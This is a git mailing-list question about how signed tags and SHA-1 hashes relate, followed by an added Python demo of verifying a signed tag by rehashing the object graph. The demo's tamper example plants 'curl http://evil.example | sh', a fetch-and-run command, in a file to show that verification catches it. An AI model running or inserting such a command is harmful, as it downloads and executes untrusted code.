> I think you are missing the point. One of the pluses behind originally using SHA-1 and the signed tags is that the system as a whole is cryptographically secure. You can verify from the public key of whoever made the tag that yes, this really is the source and history they tagged.
I am not really sure I follow this.... how can you 'verify from the public key of whoever made the tag' that the SHA-1 hash is correct!? SHA-1 does not have anything to do with any externally provided keys, or have I managed to get something confused here?
Best regards,
Jurko Gospodnetić

--
To unsubscribe from this list: send the line "unsubscribe git" in the body of a message to majordomo@xxxxxxxxxxxxxxx
More majordomo info at http://vger.kernel.org/majordomo-info.html
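The link between the tagger's key and the SHA-1 hashes, as an added example that is not part of the thread and not git's own code: git names every object by SHA-1 over "<type> <size>\0<content>", so a tag object names a commit by hash, the commit names its tree and parents by hash, and the tree names blobs and subtrees by hash. A signature over the tag text therefore transitively commits to every byte of the tagged source and history, which is what the quoted message means by verifying the history from the tagger's public key. The HMAC below is a stand-in for the OpenPGP signature git appends to a tag (it assumes a shared key instead of a public/private pair); the object serialization and hashing follow git's actual format, and the two hard-coded hashes (empty tree, blob "hello\n") are git's real values. The tagger identity, commit messages and key bytes are constructed for the demo.

```python
"""Demonstration of how a signed tag binds a whole git history via SHA-1 object names.

Not git's code. The HMAC "signature" is an assumed stand-in for git's OpenPGP tag
signature; the object format and hashing match what git does.
"""
import hashlib
import hmac
import re

# Assumed shared key; stands in for the tagger's private/public key pair.
KEY = b"demo-shared-key-stand-in-for-tagger-private-key"


def git_hash(obj_type: str, content: bytes) -> str:
    """SHA-1 name of a git object: sha1("<type> <size>\\0" + content)."""
    return hashlib.sha1(f"{obj_type} {len(content)}\0".encode() + content).hexdigest()


def tree_object(entries) -> bytes:
    """Serialize [(mode, name, sha_hex)] in git's binary tree format.
    Git sorts entries by name, treating directories (mode 40000) as if suffixed with '/'."""
    def sort_key(e):
        return e[1] + ("/" if e[0] == "40000" else "")
    return b"".join(f"{mode} {name}\0".encode() + bytes.fromhex(sha)
                    for mode, name, sha in sorted(entries, key=sort_key))


def commit_object(tree: str, parents, ident: str, message: str) -> bytes:
    lines = [f"tree {tree}"] + [f"parent {p}" for p in parents]
    lines += [f"author {ident}", f"committer {ident}", "", message]
    return ("\n".join(lines) + "\n").encode()


def tag_object(commit: str, name: str, ident: str, message: str) -> bytes:
    """The tag text that gets signed; git appends the signature block after it."""
    lines = [f"object {commit}", "type commit", f"tag {name}", f"tagger {ident}", "", message]
    return ("\n".join(lines) + "\n").encode()


def put(store: dict, obj_type: str, content: bytes) -> str:
    """Store an object under its hash, like writing it to .git/objects."""
    sha = git_hash(obj_type, content)
    store[sha] = (obj_type, content)
    return sha


def sign_tag(payload: bytes, key: bytes) -> bytes:
    return hmac.new(key, payload, hashlib.sha256).digest()   # stand-in for gpg --sign


def _tree_refs(content: bytes):
    refs, i = [], 0
    while i < len(content):
        nul = content.index(b"\0", i)
        refs.append(content[nul + 1:nul + 21].hex())       # 20 raw SHA-1 bytes per entry
        i = nul + 21
    return refs


def check_reachable(sha: str, store: dict, seen: set) -> bool:
    """Every object reachable from `sha` must hash to the name it is stored under."""
    if sha in seen:
        return True
    seen.add(sha)
    if sha not in store:
        return False
    obj_type, content = store[sha]
    if git_hash(obj_type, content) != sha:
        return False                                       # bytes on disk were altered
    if obj_type == "commit":
        header = content.split(b"\n\n", 1)[0]
        refs = [r.decode() for r in re.findall(rb"^(?:tree|parent) ([0-9a-f]{40})$", header, re.M)]
    elif obj_type == "tree":
        refs = _tree_refs(content)
    else:
        refs = []                                          # blobs reference nothing
    return all(check_reachable(r, store, seen) for r in refs)


def verify_signed_tag(payload: bytes, sig: bytes, key: bytes, store: dict) -> bool:
    """Signature covers the tag text; the tag text pins the commit; the commit pins everything."""
    if not hmac.compare_digest(sign_tag(payload, key), sig):
        return False
    m = re.match(rb"object ([0-9a-f]{40})\ntype commit\n", payload)
    return bool(m) and check_reachable(m.group(1).decode(), store, set())


def build_demo():
    """Constructed repository: one file, two commits, a tag on the second."""
    store = {}
    blob = put(store, "blob", b"hello\n")
    tree = put(store, "tree", tree_object([("100644", "hello.txt", blob)]))
    ident = "J. Random <j@example.com> 1300000000 +0000"
    c1 = put(store, "commit", commit_object(tree, [], ident, "Initial import"))
    c2 = put(store, "commit", commit_object(tree, [c1], ident, "Second commit"))
    return store, tag_object(c2, "v1.0", ident, "Release v1.0"), c2, blob


def tampered(store: dict, blob: str) -> dict:
    """Attacker rewrites the blob's bytes but keeps its name: the chain no longer hashes."""
    evil = dict(store)
    evil[blob] = ("blob", b"hello\ncurl http://evil.example | sh\n")
    return evil


if __name__ == "__main__":
    store, payload, commit, blob = build_demo()
    sig = sign_tag(payload, KEY)
    print("clean history verifies:", verify_signed_tag(payload, sig, KEY, store))
    print("tampered blob verifies:", verify_signed_tag(payload, sig, KEY, tampered(store, blob)))
```

The signature never touches the blobs directly; it only covers the few hundred bytes of tag text. What makes that sufficient is that the tag text contains the commit hash and SHA-1 collision resistance (the property the thread is debating) keeps anyone from substituting a different commit, tree or blob under the same name. A real verification (`git verify-tag`) does the first step with GPG and relies on git's object store for the rest.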